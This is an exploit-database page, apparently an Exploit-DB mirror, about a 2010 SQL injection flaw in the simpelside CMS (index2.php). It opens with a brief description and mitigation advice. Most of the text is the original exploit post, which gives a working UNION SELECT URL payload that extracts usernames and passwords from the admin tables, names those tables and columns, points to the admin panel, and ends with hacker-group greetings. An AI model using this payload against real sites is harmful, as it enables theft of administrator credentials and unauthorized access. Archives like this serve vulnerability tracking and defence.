header-logo
Suggest Exploit
vendor:
N/A
by:
MN9
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

simpelside (index2.php) SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable application. This can be done by appending the malicious SQL query to the vulnerable parameter in the HTTP request. An attacker can use this vulnerability to gain unauthorized access to the application and its data.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries. Parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

#Tital : simpelside (index2.php) SQL Injection Vulnerability#EDB-ID: # CVE-ID: ()# OSVDB-ID: ()# Author: MN9# Published: 2010-05-25# Verified: yes



##########################################################>..> Author : MN9
>..> Email  : Mn9(at)Live.No >..> Script Home :  www.simpelside.dk
>..>  Doork :  :)##########################################################
~## Exploit ##~ 
http://site/index2.php?id=2 [ SQL Injection ] &mainid=2

~## Example ##~ http://site/index2.php?id=2 and 1=0 union select 1,2,concat(brugernavn,0x3a,adgangskode),4,5,6 from web1_brugere--&mainid=2

##########################################################
# All Tables admin :: 
web1_brugereweb2_brugereweb3_brugereweb4_brugere
# column user : brugernavn# column pass : adgangskode##########################################################
# admin panel :
http://site/admin/
##########################################################
# Greetz to :
RoMaNcYxHaCkEr ~ Mr.SaFa7 ~ Sniper code ~ All Al-Mslm3n

                [  v4-team.com  ]  &&  [  7rs.org  ]